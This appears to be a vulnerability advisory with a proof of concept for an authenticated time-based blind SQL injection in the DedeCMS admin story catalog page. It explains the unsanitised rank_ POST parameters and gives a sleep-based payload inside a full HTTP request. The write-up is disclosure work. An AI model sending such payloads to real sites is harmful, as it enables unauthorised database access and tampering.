Description

Admin backend story catalog blind SQL injection via post parameters.

Affected Version

DedeCMS <= 5.7.160

POC

Login to admin backend management.
Request to /dede/story_catalog.php with GET parameter action=uprank and POST parameters rank_1=1'+and+sleep(3)+and+'1, this payload will lead to a time-based SQL injection.
Requires PHP ≤ 5 and MySQL ≤ 5.5, and the story component contains at least one record in database.
In the source code of /dede/story_catalog.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.

Full POC request:

POST /cms/dedecms/dede/story_catalog.php?action=uprank HTTP/1.1
Host: 192.168.0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; _csrf_name_273c7533=e59946ea73ad488a9da6a03897480ac5; _csrf_name_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV_GOBACK_URL=%2Fcms%2Fdedecms%2Fdede%2Fstory_books.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

rank_1=1'+and+sleep(3)+and+'1

Reference

Reported by Srpopty, vulnerability discovered by using Corax.